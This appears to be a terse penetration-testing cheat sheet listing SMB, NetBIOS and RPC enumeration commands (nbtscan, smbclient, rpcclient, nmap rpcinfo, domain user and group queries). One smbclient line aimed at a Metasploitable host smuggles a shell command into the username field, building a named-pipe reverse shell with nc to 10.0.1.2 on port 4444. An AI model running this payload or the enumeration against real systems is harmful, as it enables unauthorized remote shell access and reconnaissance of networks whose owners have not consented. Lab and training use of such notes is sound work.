======
nbtscan <ip-address>
nbtscan -r 10.0.0.0/24
smbclient -I <ip-address> -L <hostname>
smbclient \\<ip-address>\share -U <user>
smbclient -I 10.0.0.107 -LMETASPLOITABLE -U"/=nohup mkfifo /tmp/p; nc 10.0.1.2 4444 0</tmp/p | /bin/sh >/tmp/p 2>&1; rm /tmp/p
"
net use \<target-ip>\share <password> /u:<username>
rpcclient -U "" ip.addr
nmap -sV -p 111 --script=rpcinfo 10.0.0.1-254
enumdomgroups
querygroup 0x44f
querygroupmem 0x44f
enumdomusers
queryuser 0x451